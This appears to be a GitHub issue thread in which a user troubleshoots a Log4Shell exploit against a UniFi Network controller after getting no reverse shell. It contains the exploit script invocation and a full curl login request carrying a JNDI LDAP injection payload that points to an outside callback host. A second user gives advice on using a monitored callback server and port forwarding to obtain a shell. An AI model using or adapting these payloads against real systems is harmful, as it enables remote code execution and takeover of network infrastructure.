I get no shell!

[Drjacky]

Despite the UniFi version is 5.14.23, when I run either:

• python3 exploit.py -u https://unifi.example.com:8443 -i 127.0.0.1 -p 4444
• curl -i -s -k -X POST -H $'Host: unifi.example.com:8443' -H $'Content-Length: 104' --data-binary $'{\"username\":\"a\",\"password\":\"a\",\"remember\":\"${jndi:ldap://eb0uvi.dnslog.cn:1389/o=tomcat}\",\"strict\":true}' $'https://unifi.example.com:8443/manage/account/login'

For the former:

[*] Firing payload!
[*] Check for a callback!

and there is no request on ngrok:

Connections                   ttl     opn     rt1     rt5     p50     p90
                              0       0       0.00    0.00    0.00    0.00

And for the latter:

HTTP/1.1 200
X-Frame-Options: SAMEORIGIN
vary: accept-encoding
Accept-Ranges: bytes
Last-Modified: Thu, 20 Aug 2020 11:51:01 GMT
Cache-Control: max-age=0
Expires: Sun, 10 Dec 2023 11:42:32 GMT
Content-Type: text/html
Content-Length: 1307
Date: Sun, 10 Dec 2023 11:42:31 GMT

<!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><title>UniFi Network</title><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" unifi-prevent-focus-zoom><meta name="apple-itunes-app" content="app-id=1057750338"><base href="/manage/"><link rel="apple-touch-icon-precomposed" href="angular/gf3b4dc4/images/favicons/favicon-152.png?v=2"><meta name="msapplication-TileColor" content="#0193d7"><meta name="msapplication-TileImage" content="angular/gf3b4dc4/images/favicons/favicon-144.png?v=2"><link rel="apple-touch-icon-precomposed" sizes="152x152" href="angular/gf3b4dc4/images/favicons/favicon-152.png?v=2"><link rel="apple-touch-icon-precomposed" sizes="144x144" href="angular/gf3b4dc4/images/favicons/favicon-144.png?v=2"><link rel="apple-touch-icon-precomposed" sizes="120x120" href="angular/gf3b4dc4/images/favicons/favicon-120.png?v=2"><link rel="apple-touch-icon-precomposed" sizes="72x72" href="angular/gf3b4dc4/images/favicons/favicon-72.png?v=2"><link rel="apple-touch-icon-precomposed" href="angular/gf3b4dc4/images/favicons/favicon-57.png?v=2"><link rel="icon" href="angular/gf3b4dc4/images/favicons/favicon-32.png?v=2" sizes="32x32"><script src="angular/gf3b4dc4/js/index.js" defer></script></head><body id="unifi-network-app-container"></body></html>%

[muslimfrompk]

Are you sure that if the target is even vulnerable also in the second request replace eb0uvi.dnslog.cn with a IP that you can monitor maybe an interact.sh server and for the first command you need to setup portforwarding in order to get shell